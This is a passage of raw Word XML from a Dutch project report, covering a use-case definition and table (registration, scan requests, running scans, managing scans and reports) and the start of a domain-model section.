                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="95000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1750AD3C" w14:textId="06A9F826" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1339429E" wp14:editId="16BD5376">
                                  <wp:extent cx="266700" cy="266700"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="520"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proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00AC16BE">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Use</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00AC16BE">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> Case</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="105D15E0" w14:textId="65C89B36" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve">Een </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>use</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> case is een lijst met acties die de interacties tussen de acteurs en het systeem definiëren om een bepaald doel te bereiken. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41A17EEE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB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992446" id="_x0000_s1114" type="#_x0000_t202" style="position:absolute;margin-left:401.5pt;margin-top:35.95pt;width:452.7pt;height:73.15pt;z-index:251823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asbAz4CAABxBAAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iuq9OjKStjTpFl67DgK4b&#10;0O4DaFmOhUiiJymxu68fJadput2GXQRKpB/J90hfXY9Gs710XqGt+Pxsxpm0AhtlNxX/8XT34ZIz&#10;H8A2oNHKij9Lz69X799dDX0pc+xQN9IxArG+HPqKdyH0ZZZ50UkD/gx7acnZojMQ6Oo2WeNgIHSj&#10;s3w2O88GdE3vUEjv6fV2cvJVwm9bKcK3tvUyMF1xqi2k06Wzjme2uoJy46DvlDiUAf9QhQFlKekR&#10;6hYCsJ1Tf0EZJRx6bMOZQJNh2yohUw/UzXz2RzePHfQy9ULk+P5Ik/9/sOJh/90x1VR8UZxzZsGQ&#10;SE9y68MetiyP/Ay9LynssafAMH7EkXROvfr+HsXWM4vrDuxG3jiHQyehofrm8cvs5NMJx0eQeviK&#10;DaWBXcAENLbORPKIDkbopNPzURs5BibocXmxKPKCXIJ8ZOXFRUoB5cvXvfPhs0TDolFxR9ondNjf&#10;+xCrgfIlJCbzqFVzp7ROlzhvcq0d2wNNSr2ZOtQ7Q6VOb8VyNkvzQjhpPGN4Qn2DpC0bqMBlvpw4&#10;epPFbepjDkI7ATwNMyrQTmhlKn55DIIyMvvJNmliAyg92VSNtgeqI7sTz2Gsx6TqZRIi6lBj80zk&#10;O5x2gHaWjA7dL84Gmv+K+587cJIz/cWSgMV8sYgLky6L5UVOF3fqqU89YAVBVTxwNpnrkJYscmvx&#10;hoRuVdLgtZJDzTTXicTDDsbFOb2nqNc/xeo3AAAA//8DAFBLAwQUAAYACAAAACEABbDGW90AAAAH&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KiTCEqTZlMhEJdKCLWFAzcn3iZR&#10;43VkO234e8wJjqMZzbwpN7MZxJmc7y0jpIsEBHFjdc8twsfh9W4FwgfFWg2WCeGbPGyq66tSFdpe&#10;eEfnfWhFLGFfKIQuhLGQ0jcdGeUXdiSO3tE6o0KUrpXaqUssN4PMkmQpjeo5LnRqpOeOmtN+Mgjm&#10;rebtF2+t1tPBvYTl+yflR8Tbm/lpDSLQHP7C8Isf0aGKTLWdWHsxIMQjAeExzUFEN08e7kHUCFm6&#10;ykBWpfzPX/0AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAxasbAz4CAABxBAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEABbDGW90AAAAHAQAADwAA&#10;AAAAAAAAAAAAAACWBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1750AD3C" w14:textId="06A9F826" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1339429E" wp14:editId="16BD5376">
                            <wp:extent cx="266700" cy="266700"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="520"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proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00AC16BE">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Use</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00AC16BE">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> Case</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="105D15E0" w14:textId="65C89B36" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve">Een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>use</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> case is een lijst met acties die de interacties tussen de acteurs en het systeem definiëren om een bepaald doel te bereiken. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41A17EEE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F44BBB" w:rsidRPr="002D66F8">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00620167">
        <w:t>.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00E17EFE" w:rsidRPr="002D66F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008338AF" w:rsidRPr="002D66F8">
        <w:t>Usecase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A9A926" w14:textId="77777777" w:rsidR="006870C5" w:rsidRDefault="006870C5"/>
    <w:p w14:paraId="0723F35F" w14:textId="77777777" w:rsidR="008C5390" w:rsidRDefault="008C5390" w:rsidP="002974AE"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="786"/>
        <w:gridCol w:w="1836"/>
        <w:gridCol w:w="1347"/>
        <w:gridCol w:w="2844"/>
        <w:gridCol w:w="1405"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A6C16" w14:paraId="79D2BA5D" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3BC2A9" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>UC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA7B493" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Use</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC72373" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A7C786" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9E23DE" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6C16" w14:paraId="22A71725" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24446867" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>UC-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F65F4C8" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Registratie klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="356C93CB" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Klant, API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="216EA565" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>De klant registreert zichzelf voor een account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CCBD495" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CMS extensie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6C16" w14:paraId="60E0025F" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F2FB710" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>UC-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648ECBBC" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Aanvraag scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552ACCED" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Klant, API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="660493EF" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Het aanvragen van een scan doormiddel van het invullen van een online formulier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58AC30FB" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>CMS extensie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6C16" w14:paraId="62F287D4" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC7D3A7" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>UC-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="690F58AD" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Voer scan opdracht uit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC9C8BB" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34266648" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Op verzoek van de klant een opdracht voor een scan uit laten voeren door het systeem via de terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402EA269" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Scan commando’s,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58197035" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Scan Configuratie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6C16" w14:paraId="767FED31" w14:textId="77777777" w:rsidTr="00370603">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D51C369" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>UC-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1836" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C23C22" w14:textId="32726CAC" w:rsidR="001A6C16" w:rsidRDefault="00B67D92" w:rsidP="00370603">
            <w:r>
              <w:t xml:space="preserve">Beheren van </w:t>
            </w:r>
            <w:r w:rsidR="001A6C16">
              <w:t>scans en rapporten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A89A589" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DA07A06" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Het beheren van scans, het handmatig genereren van rapporten en verzenden van scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6075F864" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Genereren van rapporten,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C707B8" w14:textId="77777777" w:rsidR="001A6C16" w:rsidRDefault="001A6C16" w:rsidP="00370603">
            <w:r>
              <w:t>Verzenden van scans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D7CCCB4" w14:textId="77777777" w:rsidR="001E16EF" w:rsidRDefault="008A3093" w:rsidP="002974AE">
      <w:r>
        <w:t>Tabel 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132469A" w14:textId="0A02ED6E" w:rsidR="00950F74" w:rsidRPr="008C5390" w:rsidRDefault="001E16EF" w:rsidP="002974AE">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Usecas</w:t>
      </w:r>
      <w:r w:rsidR="008715B9">
        <w:t>es</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008715B9">
        <w:t xml:space="preserve"> zijn te vinden in Bijlage A</w:t>
      </w:r>
      <w:r w:rsidR="00764642">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B144F69" w14:textId="7BE4871B" w:rsidR="00BD01D5" w:rsidRDefault="00BD01D5" w:rsidP="00834F03">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="00BD01D5" w:rsidSect="00FE7456">
          <w:footerReference w:type="even" r:id="rId70"/>
          <w:footerReference w:type="default" r:id="rId71"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684C2EBC" w14:textId="7B4D0D23" w:rsidR="000B0FF6" w:rsidRPr="00DE06EE" w:rsidRDefault="00620167" w:rsidP="00620167">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc491022092"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.1.4</w:t>
      </w:r>
      <w:r w:rsidR="00DE06EE" w:rsidRPr="00DE06EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B0FF6" w:rsidRPr="00DE06EE">
        <w:t>Domein model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="0F150A89" w14:textId="77777777" w:rsidR="00DE06EE" w:rsidRDefault="00DE06EE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA9A7EE" w14:textId="75689BF4" w:rsidR="00395EE0" w:rsidRDefault="005949E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395EE0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251820032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07BCD4FD" wp14:editId="146B080A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-637540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4073313</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1811655" cy="905510"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="49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1655" cy="905510"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="66A4E140" w14:textId="2D2364A3" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A024DA">
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Figuur 5.3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41D88F4A" w14:textId="05677DBD" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Domein model</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6E4F7E92" w14:textId="1179DBF0" w:rsidR="00CE4BB5" w:rsidRPr="00A024DA" w:rsidRDefault="00CE4BB5">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BCD4FD" id="_x0000_s1115" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-50.2pt;margin-top:320.75pt;width:142.65pt;height:71.3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eDSiUCAAAlBAAADgAAAGRycy9lMm9Eb2MueG1srFPbbtswDH0fsH8Q9L7YDuIuMeIUXboMA7oL&#10;0O4DZFmOhUiiJimxu68fJadZ0L0N84MgmtQheXi4vh21IifhvART02KWUyIMh1aafU1/PO3eLSnx&#10;gZmWKTCips/C09vN2zfrwVZiDj2oVjiCIMZXg61pH4KtsszzXmjmZ2CFQWcHTrOApttnrWMDomuV&#10;zfP8JhvAtdYBF97j3/vJSTcJv+sED9+6zotAVE2xtpBOl84mntlmzaq9Y7aX/FwG+4cqNJMGk16g&#10;7llg5OjkX1BacgceujDjoDPoOslF6gG7KfJX3Tz2zIrUC5Lj7YUm//9g+dfTd0dkW9PFak6JYRqH&#10;9CQOPpzYgcwjP4P1FYY9WgwM4wcYcc6pV28fgB88MbDtmdmLO+dg6AVrsb4ivsyunk44PoI0wxdo&#10;MQ07BkhAY+d0JA/pIIiOc3q+zEaMgfCYclkUN2VJCUffKi/LIg0vY9XLa+t8+CRAk3ipqcPZJ3R2&#10;evAhVsOql5CYzIOS7U4qlQy3b7bKkRNDnezSlxp4FaYMGTB7OS8TsoH4PklIy4A6VlLXdJnHb1JW&#10;ZOOjaVNIYFJNd6xEmTM9kZGJmzA2Y5rE8kJ7A+0zEuZg0i3uGV56cL8oGVCzNfU/j8wJStRng6Sv&#10;isUiijwZi/L9HA137WmuPcxwhKppoGS6bkNajMiHgTscTicTb3GKUyXnmlGLic7z3kSxX9sp6s92&#10;b34DAAD//wMAUEsDBBQABgAIAAAAIQBjZHJB4AAAAAwBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9B&#10;TsMwEEX3SNzBGiQ2qLWD3CQNcSpAArFt6QGceJpExOModpv09rgrWI7+0/9vyt1iB3bByfeOFCRr&#10;AQypcaanVsHx+2OVA/NBk9GDI1RwRQ+76v6u1IVxM+3xcggtiyXkC62gC2EsOPdNh1b7tRuRYnZy&#10;k9UhnlPLzaTnWG4H/ixEyq3uKS50esT3Dpufw9kqOH3NT5vtXH+GY7aX6Zvus9pdlXp8WF5fgAVc&#10;wh8MN/2oDlV0qt2ZjGeDglUihIysglQmG2A3JJdbYLWCLJcJ8Krk/5+ofgEAAP//AwBQSwECLQAU&#10;AAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnht&#10;bFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVs&#10;c1BLAQItABQABgAIAAAAIQAZx4NKJQIAACUEAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItABQABgAIAAAAIQBjZHJB4AAAAAwBAAAPAAAAAAAAAAAAAAAAAH0EAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABADzAAAAigUAAAAA&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="66A4E140" w14:textId="2D2364A3" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A024DA">
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Figuur 5.3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41D88F4A" w14:textId="05677DBD" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t>Domein model</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6E4F7E92" w14:textId="1179DBF0" w:rsidR="00CE4BB5" w:rsidRPr="00A024DA" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t>Vergrote versie in bijlage</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A024DA" w:rsidRPr="00395EE0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251817984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42280D3E" wp14:editId="340481BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-10795</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1362075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5819140" cy="2565400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="491" name="Afbeelding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Domein Diagram.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
